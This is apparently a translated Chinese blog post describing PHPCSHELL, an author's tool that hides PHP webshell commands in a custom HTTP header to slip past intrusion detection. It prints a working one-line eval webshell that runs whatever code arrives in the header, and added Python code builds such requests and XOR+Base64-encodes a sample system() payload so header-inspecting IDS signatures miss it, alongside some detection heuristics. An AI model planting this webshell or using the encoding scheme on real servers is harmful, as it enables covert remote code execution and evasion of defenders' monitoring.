http://www.vul.kr/?p=455 Author: TTFCT
In 2006 I found that HTTP headers could be customized and made to carry arbitrary code, and in August 2006 I finished the PHPCSHELL C/S tool. Since then I have used this tool to bypass IDS. In 2007 I ran into cases where WSC's POST submissions failed; in those situations I connected successfully with PHPCSHELL and have used it ever since. Its concealment is very good.
That is enough background; time to explain how PHPCSHELL works:
First, look at a typical set of HTTP request headers:
GET / HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: www.vul.kr
Connection: Keep-Alive
Cookie: www.vul.kr
The request headers carry Accept, Accept-Language, User-Agent, Host and so on. Two years ago I published an article on BBSXP in which injection was done by modifying User-Agent. Besides modifying existing headers, you can also add headers of your own. For example, we add:
vulnerable: welcome to www.vul.kr
(Header names are case-insensitive, so "vulnerable" and "Vulnerable" are the same header.) The complete request then looks like this:
GET / HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: www.vul.kr
Vulnerable: welcome to www.vul.kr
Connection: Keep-Alive
Cookie: websitecookie
On the server side, the receiving code is:
<?php
echo $_SERVER['HTTP_VULNERABLE'];  // PHP exposes a request header as HTTP_ + the name upper-cased with '-' replaced by '_'
?>
After sending this request with nc (netcat), "welcome to www.vul.kr" is displayed: our custom header value has reached the script. Just as POST or GET data can feed a one-line webshell (a "one-sentence trojan"), so can a header: submitting the payload in the HTTP header works as well and slips past some IDS, which is why I always use PHPCSHELL.
If the server side is changed to:
<?php
eval($_SERVER['HTTP_VULNERABLE']);  // executes whatever PHP source arrives in the Vulnerable: header
?>
it has become a typical one-line webshell. :)
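The transport just described, as an added example that is not PHPCSHELL's own code: it builds the raw request with the extra header, then parses it the way a CGI-style server does, to show under which $_SERVER key PHP actually exposes the header (HTTP_ prefix, upper case, '-' to '_'), why a lookup spelled HTTP_Vulnerable finds nothing, and why the payload must not contain CR/LF. Host, header name and value are the ones used on this page; the browser headers are trimmed, and nothing is sent over the network.

```python
# Added example, not the original PHPCSHELL code. Models the request and the
# server-side header mapping only; it never opens a socket.
from typing import Optional

HOST = "www.vul.kr"                    # from the page
HEADER_NAME = "Vulnerable"             # from the page
HEADER_VALUE = "welcome to www.vul.kr" # from the page

# Browser-like headers that precede the custom one (abbreviated from the page).
BROWSER_HEADERS = [
    ("Accept", "image/gif, image/jpeg, image/pjpeg, */*"),
    ("Accept-Language", "zh-cn"),
    ("User-Agent", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"),
    ("Accept-Encoding", "gzip, deflate"),
]


def server_key(header_name: str) -> str:
    """Map a header name to the $_SERVER key PHP uses for it.

    PHP follows the CGI convention: prefix HTTP_, upper-case, '-' -> '_'.
    So $_SERVER['HTTP_VULNERABLE'] is populated; 'HTTP_Vulnerable' is not.
    """
    return "HTTP_" + header_name.strip().upper().replace("-", "_")


def build_request(host: str, header_name: str, value: str, path: str = "/") -> bytes:
    """Return a raw HTTP/1.1 GET with one custom header inserted before Connection.

    CR/LF is rejected so the payload cannot smuggle extra header lines
    (header injection) into the request we are constructing.
    """
    for piece in (header_name, value):
        if "\r" in piece or "\n" in piece:
            raise ValueError("header name/value must not contain CR or LF")
    headers = BROWSER_HEADERS + [
        ("Host", host),
        (header_name, value),
        ("Connection", "Keep-Alive"),
    ]
    lines = [f"GET {path} HTTP/1.1"] + [f"{name}: {val}" for name, val in headers]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def parse_request(raw: bytes) -> dict:
    """Parse request line and headers into a $_SERVER-like dict.

    Mirrors what Apache/mod_php or CGI hands to the script: REQUEST_METHOD,
    REQUEST_URI, SERVER_PROTOCOL plus one HTTP_* entry per header. Header
    names are case-insensitive on the wire, so 'vulnerable:' and
    'VULNERABLE:' land on the same key.
    """
    head, _, _body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("ascii").split("\r\n")
    method, uri, proto = request_line.split(" ", 2)
    env = {"REQUEST_METHOD": method, "REQUEST_URI": uri, "SERVER_PROTOCOL": proto}
    for line in header_lines:
        name, sep, val = line.partition(":")
        if not sep:
            raise ValueError(f"malformed header line: {line!r}")
        env[server_key(name)] = val.strip()
    return env


def lookup(env: dict, header_name: str) -> Optional[str]:
    """What echo($_SERVER[...]) would print for this header, or None if absent."""
    return env.get(server_key(header_name))


if __name__ == "__main__":
    raw = build_request(HOST, HEADER_NAME, HEADER_VALUE)
    print(raw.decode("ascii"))
    env = parse_request(raw)
    print("PHP sees", server_key(HEADER_NAME), "=", repr(lookup(env, HEADER_NAME)))
    print("HTTP_Vulnerable present?", "HTTP_Vulnerable" in env)
```

To actually send the request you would write the bytes returned by build_request to a TCP connection on port 80, which is what the nc step on this page does by hand.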
Some IDS are extreme ("BT") and inspect the HTTP headers as well. There are still ways around them; one tip: encode (encrypt) the payload in the packet and decode it on the server side before executing it.
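The "encode it, decode it on the server" tip, as an added example that is not PHPCSHELL's code. The client hides the PHP one-liner in the custom header with a toy repeating-key XOR plus Base64 (an illustration of the idea, not real encryption and not the cipher the tool uses); decode_payload is the exact mirror a server-side stub would run before eval. A signature check modelled on a simple IDS rule shows what content inspection catches and what it no longer catches, and anomaly_flags shows what a header-aware detector should key on instead. The key, the signature list and the set of "common" header names are assumptions.

```python
# Added example, not PHPCSHELL's code. Toy XOR+Base64 obfuscation of a header
# payload, its server-side mirror, and two detection views of the result.
import base64
import re

HEADER_NAME = "Vulnerable"   # from the page
KEY = b"vul.kr"              # assumed shared secret; not from the page

# Header names a request normally carries (assumed list).
COMMON_HEADERS = {
    "accept", "accept-language", "user-agent", "accept-encoding", "host",
    "connection", "cookie", "referer", "content-type", "content-length",
}

# Naive content signatures of the kind a header-inspecting IDS might apply.
SIGNATURES = [re.compile(p, re.I) for p in (
    r"\beval\s*\(", r"\bsystem\s*\(", r"<\?php", r"\$_(GET|POST|SERVER)",
)]

# A value made only of Base64 alphabet characters, 16+ long, optional padding.
B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key restores the input."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_payload(php_code: str, key: bytes = KEY) -> str:
    """Client side: PHP source -> header-safe string (no CR/LF, no spaces)."""
    return base64.b64encode(xor_bytes(php_code.encode("utf-8"), key)).decode("ascii")


def decode_payload(header_value: str, key: bytes = KEY) -> str:
    """Server-side mirror: what the PHP stub would compute and then eval()."""
    return xor_bytes(base64.b64decode(header_value), key).decode("utf-8")


def signature_hits(header_value: str) -> list:
    """Patterns from SIGNATURES that match the raw header value."""
    return [p.pattern for p in SIGNATURES if p.search(header_value)]


def anomaly_flags(headers: dict) -> list:
    """Structural signals that survive encoding: unknown header names, and
    Base64-shaped values sitting under them."""
    flags = []
    for name, value in headers.items():
        if name.lower() not in COMMON_HEADERS:
            flags.append(f"non-standard header: {name}")
            if B64_SHAPE.match(value):
                flags.append(f"base64-shaped value in {name} ({len(value)} chars)")
    return flags


if __name__ == "__main__":
    plain = "system($_GET['c']);"          # constructed sample payload
    enc = encode_payload(plain)
    print(f"{HEADER_NAME}: {enc}")
    print("round trip ok:", decode_payload(enc) == plain)
    print("signatures on plain  :", signature_hits(plain))
    print("signatures on encoded:", signature_hits(enc))
    print("anomaly flags        :", anomaly_flags({"Host": "www.vul.kr", HEADER_NAME: enc}))
```

On the PHP side the stub would base64-decode $_SERVER['HTTP_VULNERABLE'], XOR it with the same key byte by byte, and eval the result. Note the trade-off: the key has to sit in the PHP file on disk, so anyone who reads the file can decode captured traffic, and the encoding does nothing about the two signals anomaly_flags reports, which are the ones a defender should alert on.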
[PHPCSHELL screenshot; image not reproduced here.] I originally wanted to give it the same functionality as WSC, but the workload is too heavy and I do not have time to write it.
PS: There is a length limit on what can be submitted in an HTTP header; the allowed length is 8184 characters. The limit applies per header line, not to the whole request: Apache's default LimitRequestFieldSize is 8190 bytes and covers the header name, colon and value together.
Finally, everyone is welcome to visit http://www.vul.kr